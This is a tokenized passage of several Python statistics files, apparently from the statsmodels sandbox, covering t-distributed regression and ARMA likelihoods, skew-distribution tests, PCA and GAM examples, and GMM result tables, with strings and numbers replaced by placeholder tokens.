. fix_df is False : <EOL> if use_kurtosis : <EOL> kurt = stats . kurtosis ( res_ols . resid ) <EOL> df = <NUM_LIT> / kurt + <NUM_LIT:4> <EOL> else : <EOL> df = <NUM_LIT:5> <EOL> start_params [ - <NUM_LIT:2> ] = df <EOL> start_params [ - <NUM_LIT:1> ] = np . sqrt ( res_ols . scale ) <EOL> self . 
start_params = start_params <EOL> def loglike ( self , params ) : <EOL> return - self . nloglikeobs ( params ) . sum ( <NUM_LIT:0> ) <EOL> def nloglikeobs ( self , params ) : <EOL> """<STR_LIT>""" <EOL> if not self . fixed_params is None : <EOL> params = self . expandparams ( params ) <EOL> beta = params [ : - <NUM_LIT:2> ] <EOL> df = params [ - <NUM_LIT:2> ] <EOL> scale = np . abs ( params [ - <NUM_LIT:1> ] ) <EOL> loc = np . dot ( self . exog , beta ) <EOL> endog = self . endog <EOL> x = ( endog - loc ) / scale <EOL> lPx = sps_gamln ( ( df + <NUM_LIT:1> ) / <NUM_LIT:2> ) - sps_gamln ( df / <NUM_LIT> ) <EOL> lPx -= <NUM_LIT:0.5> * np_log ( df * np_pi ) + ( df + <NUM_LIT:1> ) / <NUM_LIT> * np_log ( <NUM_LIT:1> + ( x ** <NUM_LIT:2> ) / df ) <EOL> lPx -= np_log ( scale ) <EOL> return - lPx <EOL> def predict ( self , params , exog = None ) : <EOL> if exog is None : <EOL> exog = self . exog <EOL> return np . dot ( exog , params [ : self . exog . shape [ <NUM_LIT:1> ] ] ) <EOL> from scipy import stats <EOL> from statsmodels . tsa . arma_mle import Arma <EOL> class TArma ( Arma ) : <EOL> '''<STR_LIT>''' <EOL> def loglike ( self , params ) : <EOL> return - self . nloglikeobs ( params ) . sum ( <NUM_LIT:0> ) <EOL> def nloglikeobs ( self , params ) : <EOL> """<STR_LIT>""" <EOL> errorsest = self . geterrors ( params [ : - <NUM_LIT:2> ] ) <EOL> df = params [ - <NUM_LIT:2> ] <EOL> scale = np . abs ( params [ - <NUM_LIT:1> ] ) <EOL> llike = - stats . t . _logpdf ( errorsest / scale , df ) + np_log ( scale ) <EOL> return llike <EOL> def fit_mle ( self , order , start_params = None , method = '<STR_LIT>' , maxiter = <NUM_LIT> , <EOL> tol = <NUM_LIT> , ** kwds ) : <EOL> nar , nma = order <EOL> if start_params is not None : <EOL> if len ( start_params ) != nar + nma + <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> start_params = np . concatenate ( ( <NUM_LIT> * np . ones ( nar + nma ) , [ <NUM_LIT:5> , <NUM_LIT:1> ] ) ) <EOL> res = super ( TArma , self ) . 
fit_mle ( order = order , <EOL> start_params = start_params , <EOL> method = method , maxiter = maxiter , <EOL> tol = tol , ** kwds ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import os <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ngroup = <NUM_LIT:100> <EOL> n_min = <NUM_LIT:1> <EOL> n_max = <NUM_LIT:5> <EOL> dsix = <NUM_LIT:0> <EOL> for pr in <NUM_LIT:1> , <NUM_LIT:2> : <EOL> re_sd = np . linspace ( - <NUM_LIT:0.5> , <NUM_LIT> , pr ) <EOL> for pf in <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> : <EOL> for sig in <NUM_LIT:0.5> , <NUM_LIT:2> : <EOL> params = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , pf ) <EOL> endog = [ ] <EOL> exog_fe = [ ] <EOL> exog_re = [ ] <EOL> groups = [ ] <EOL> for i in range ( ngroup ) : <EOL> n = np . random . randint ( n_min , n_max , <NUM_LIT:1> ) <EOL> x_fe = np . random . normal ( size = ( n , pf ) ) <EOL> x_re = np . zeros ( ( n , pr ) ) <EOL> u = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , n ) <EOL> for j in range ( pr ) : <EOL> x_re [ : , j ] = u ** j <EOL> re = np . random . normal ( size = pr ) * re_sd <EOL> expval = np . dot ( x_fe , params ) + np . dot ( x_re , re ) <EOL> endog . append ( expval + sig * np . random . normal ( size = n ) ) <EOL> exog_fe . append ( x_fe ) <EOL> exog_re . append ( x_re ) <EOL> groups . append ( i * np . ones ( n ) ) <EOL> endog = np . concatenate ( endog ) <EOL> exog_fe = np . concatenate ( exog_fe , axis = <NUM_LIT:0> ) <EOL> exog_re = np . concatenate ( exog_re , axis = <NUM_LIT:0> ) <EOL> groups = np . concatenate ( groups , axis = <NUM_LIT:0> ) <EOL> data = np . concatenate ( ( groups [ : , None ] , endog [ : , None ] , <EOL> exog_fe , exog_re ) , axis = <NUM_LIT:1> ) <EOL> header = [ "<STR_LIT>" , ] + [ "<STR_LIT>" % k for k in range ( pf ) ] + [ "<STR_LIT>" % k for k in range ( pr ) ] <EOL> header = "<STR_LIT:U+002C>" . join ( header ) <EOL> cur_dir = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> fname = os . path . join ( cur_dir , "<STR_LIT>" , <EOL> "<STR_LIT>" % dsix ) <EOL> np . 
savetxt ( fname , data , fmt = "<STR_LIT>" , header = header , <EOL> delimiter = "<STR_LIT:U+002C>" , comments = "<STR_LIT>" ) <EOL> dsix += <NUM_LIT:1> </s>
<s> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> def acovf_fft ( x , demean = True ) : <EOL> '''<STR_LIT>''' <EOL> from scipy import signal <EOL> x = np . asarray ( x ) <EOL> if demean : <EOL> x = x - x . mean ( ) <EOL> signal . fftconvolve ( x , x [ : : - <NUM_LIT:1> ] ) [ len ( x ) - <NUM_LIT:1> : len ( x ) + <NUM_LIT:10> ] / x . shape [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from numpy . testing import assert_ , assert_almost_equal <EOL> from statsmodels . sandbox . distributions . extras import ( skewnorm , <EOL> skewnorm2 , ACSkewT_gen ) <EOL> def test_skewnorm ( ) : <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> pdf_sn = skewnorm . pdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_sn , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> pdf_sn2 = skewnorm2 . pdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_sn2 , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> cdf_sn = skewnorm . cdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> maxabs = np . max ( np . abs ( cdf_sn - cdf_r ) ) <EOL> maxrel = np . max ( np . abs ( cdf_sn - cdf_r ) / ( cdf_r + <NUM_LIT> ) ) <EOL> msg = "<STR_LIT>" % ( maxabs , maxrel , cdf_sn , <EOL> cdf_r ) <EOL> assert_almost_equal ( cdf_sn , cdf_r , decimal = <NUM_LIT:10> ) <EOL> cdf_sn2 = skewnorm2 . cdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> maxabs = np . max ( np . abs ( cdf_sn2 - cdf_r ) ) <EOL> maxrel = np . max ( np . abs ( cdf_sn2 - cdf_r ) / ( cdf_r + <NUM_LIT> ) ) <EOL> msg = "<STR_LIT>" % ( maxabs , maxrel ) <EOL> assert_almost_equal ( cdf_sn2 , cdf_r , decimal = <NUM_LIT:10> , err_msg = msg ) <EOL> def test_skewt ( ) : <EOL> skewt = ACSkewT_gen ( ) <EOL> x = [ - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . 
pdf ( x , <NUM_LIT> , <NUM_LIT:10> ) <EOL> pass <EOL> np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT> , <NUM_LIT:10> ) <EOL> np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . pdf ( x , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . pdf ( x , <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> nose . runmodule ( argv = [ '<STR_LIT:__main__>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) <EOL> print ( '<STR_LIT>' ) <EOL> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> from numpy . testing import assert_array_almost_equal <EOL> import statsmodels . api as sm <EOL> from statsmodels . sandbox . tools import pca <EOL> from statsmodels . sandbox . tools . cross_val import LeaveOneOut <EOL> nobs = <NUM_LIT:1000> <EOL> f0 = np . c_ [ np . random . normal ( size = ( nobs , <NUM_LIT:2> ) ) , np . ones ( ( nobs , <NUM_LIT:1> ) ) ] <EOL> f2xcoef = np . c_ [ np . repeat ( np . eye ( <NUM_LIT:2> ) , <NUM_LIT:2> , <NUM_LIT:0> ) , np . arange ( <NUM_LIT:4> ) [ : : - <NUM_LIT:1> ] ] . T <EOL> f2xcoef = np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ] ) <EOL> f2xcoef = np . array ( [ [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:0.1> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ] ) <EOL> x0 = np . dot ( f0 , f2xcoef ) <EOL> x0 += <NUM_LIT:0.1> * np . random . normal ( size = x0 . shape ) <EOL> ytrue = np . dot ( f0 , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> y0 = ytrue + <NUM_LIT:0.1> * np . random . normal ( size = ytrue . shape ) <EOL> xred , fact , eva , eve = pca ( x0 , keepdim = <NUM_LIT:0> ) <EOL> print ( eve ) <EOL> print ( fact [ : <NUM_LIT:5> ] ) <EOL> print ( f0 [ : <NUM_LIT:5> ] ) <EOL> import statsmodels . api as sm <EOL> res = sm . OLS ( y0 , sm . add_constant ( x0 , prepend = False ) ) . fit ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( res . params ) <EOL> print ( res . aic ) <EOL> print ( res . rsquared ) <EOL> print ( '<STR_LIT>' ) <EOL> results = [ ] <EOL> xred , fact , eva , eve = pca ( x0 , keepdim = <NUM_LIT:0> , normalize = <NUM_LIT:1> ) <EOL> for k in range ( <NUM_LIT:0> , x0 . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) : <EOL> fact_wconst = sm . 
add_constant ( fact [ : , : k ] , prepend = False ) <EOL> res = sm . OLS ( y0 , fact_wconst ) . fit ( ) <EOL> prederr2 = <NUM_LIT:0.> <EOL> for inidx , outidx in LeaveOneOut ( len ( y0 ) ) : <EOL> resl1o = sm . OLS ( y0 [ inidx ] , fact_wconst [ inidx , : ] ) . fit ( ) <EOL> prederr2 += ( y0 [ outidx ] - resl1o . predict ( fact_wconst [ outidx , : ] ) ) ** <NUM_LIT> <EOL> results . append ( [ k , res . aic , res . bic , res . rsquared_adj , prederr2 ] ) <EOL> results = np . array ( results ) <EOL> print ( results ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( np . r_ [ ( np . argmin ( results [ : , <NUM_LIT:1> : <NUM_LIT:3> ] , <NUM_LIT:0> ) , np . argmax ( results [ : , <NUM_LIT:3> ] , <NUM_LIT:0> ) , <EOL> np . argmin ( results [ : , - <NUM_LIT:1> ] , <NUM_LIT:0> ) ) ] ) <EOL> from statsmodels . iolib . table import ( SimpleTable , default_txt_fmt , <EOL> default_latex_fmt , default_html_fmt ) <EOL> headers = '<STR_LIT>' . split ( '<STR_LIT:U+002CU+0020>' ) <EOL> numformat = [ '<STR_LIT>' ] + [ '<STR_LIT>' ] * <NUM_LIT:4> <EOL> txt_fmt1 = dict ( data_fmts = numformat ) <EOL> tabl = SimpleTable ( results , headers , None , txt_fmt = txt_fmt1 ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( tabl ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from statsmodels . compat . python import lrange , zip <EOL> import time <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal <EOL> from scipy import stats <EOL> from statsmodels . sandbox . gam import AdditiveModel <EOL> from statsmodels . sandbox . gam import Model as GAM <EOL> from statsmodels . genmod import families <EOL> from statsmodels . genmod . generalized_linear_model import GLM <EOL> from statsmodels . regression . linear_model import OLS , WLS <EOL> np . random . seed ( <NUM_LIT> ) <EOL> order = <NUM_LIT:3> <EOL> sigma_noise = <NUM_LIT:0.5> <EOL> nobs = <NUM_LIT:1000> <EOL> lb , ub = - <NUM_LIT> , <NUM_LIT:4> <EOL> x1 = np . linspace ( lb , ub , nobs ) <EOL> x2 = np . sin ( <NUM_LIT:2> * x1 ) <EOL> x = np . column_stack ( ( x1 / x1 . max ( ) * <NUM_LIT:2> , x2 ) ) <EOL> exog = ( x [ : , : , None ] ** np . arange ( order + <NUM_LIT:1> ) [ None , None , : ] ) . reshape ( nobs , - <NUM_LIT:1> ) <EOL> idx = lrange ( ( order + <NUM_LIT:1> ) * <NUM_LIT:2> ) <EOL> del idx [ order + <NUM_LIT:1> ] <EOL> exog_reduced = exog [ : , idx ] <EOL> y_true = exog . sum ( <NUM_LIT:1> ) / <NUM_LIT> <EOL> z = y_true <EOL> d = x <EOL> y = y_true + sigma_noise * np . random . randn ( nobs ) <EOL> example = <NUM_LIT:1> <EOL> if example == <NUM_LIT:1> : <EOL> m = AdditiveModel ( d ) <EOL> m . fit ( y ) <EOL> y_pred = m . results . predict ( d ) <EOL> for ss in m . smoothers : <EOL> print ( ss . params ) <EOL> res_ols = OLS ( y , exog_reduced ) . fit ( ) <EOL> print ( res_ols . params ) <EOL> if example > <NUM_LIT:0> : <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( ) <EOL> plt . plot ( exog ) <EOL> y_pred = m . results . mu <EOL> plt . figure ( ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> plt . plot ( y , '<STR_LIT:.>' , alpha = <NUM_LIT> ) <EOL> plt . plot ( y_true , '<STR_LIT>' , label = '<STR_LIT:true>' ) <EOL> plt . plot ( res_ols . 
fittedvalues , '<STR_LIT>' , label = '<STR_LIT>' , lw = <NUM_LIT:2> , alpha = - <NUM_LIT> ) <EOL> plt . plot ( y_pred , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> counter = <NUM_LIT:2> <EOL> for ii , xx in zip ( [ '<STR_LIT:z>' , '<STR_LIT>' , '<STR_LIT>' ] , [ z , x [ : , <NUM_LIT:0> ] , x [ : , <NUM_LIT:1> ] ] ) : <EOL> sortidx = np . argsort ( xx ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , counter ) <EOL> plt . plot ( xx [ sortidx ] , y [ sortidx ] , '<STR_LIT:.>' , alpha = <NUM_LIT> ) <EOL> plt . plot ( xx [ sortidx ] , y_true [ sortidx ] , '<STR_LIT>' , label = '<STR_LIT:true>' , lw = <NUM_LIT:2> ) <EOL> plt . plot ( xx [ sortidx ] , y_pred [ sortidx ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' + ii ) <EOL> counter += <NUM_LIT:1> <EOL> plt . show ( ) </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> est = dict ( <EOL> rank = <NUM_LIT> , <EOL> N = <NUM_LIT> , <EOL> Q = <NUM_LIT> , <EOL> J = <NUM_LIT> , <EOL> J_df = <NUM_LIT:2> , <EOL> k_1 = <NUM_LIT> , <EOL> converged = <NUM_LIT:1> , <EOL> has_xtinst = <NUM_LIT:0> , <EOL> type = <NUM_LIT:1> , <EOL> n_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT> , <EOL> n_moments = <NUM_LIT:15> , <EOL> k_aux = <NUM_LIT> , <EOL> k_eq_model = <NUM_LIT:0> , <EOL> k_eq = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> eqnames = "<STR_LIT:1>" , <EOL> technique = "<STR_LIT>" , <EOL> winit = "<STR_LIT>" , <EOL> estimator = "<STR_LIT>" , <EOL> wmatrix = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> params = "<STR_LIT>" , <EOL> inst_1 = "<STR_LIT>" , <EOL> params_1 = "<STR_LIT>" , <EOL> sexp_1 = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . 
nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> ] ) . reshape ( <NUM_LIT> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT> , <NUM_LIT> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . __dict__ = self <EOL> for i , att in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> self [ att ] = self . 
params_table [ : , i ] <EOL> results_twostep = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> rank = <NUM_LIT> , <EOL> N = <NUM_LIT> , <EOL> Q = <NUM_LIT> , <EOL> J = <NUM_LIT> , <EOL> J_df = <NUM_LIT:2> , <EOL> k_1 = <NUM_LIT> , <EOL> converged = <NUM_LIT:1> , <EOL> has_xtinst = <NUM_LIT:0> , <EOL> type = <NUM_LIT:1> , <EOL> n_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT> , <EOL> n_moments = <NUM_LIT:15> , <EOL> k_aux = <NUM_LIT> , <EOL> k_eq_model = <NUM_LIT:0> , <EOL> k_eq = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> eqnames = "<STR_LIT:1>" , <EOL> technique = "<STR_LIT>" , <EOL> winit = "<STR_LIT>" , <EOL> estimator = "<STR_LIT>" , <EOL> wmatrix = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> params = "<STR_LIT>" , <EOL> inst_1 = "<STR_LIT>" , <EOL> params_1 = "<STR_LIT>" , <EOL> sexp_1 = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , 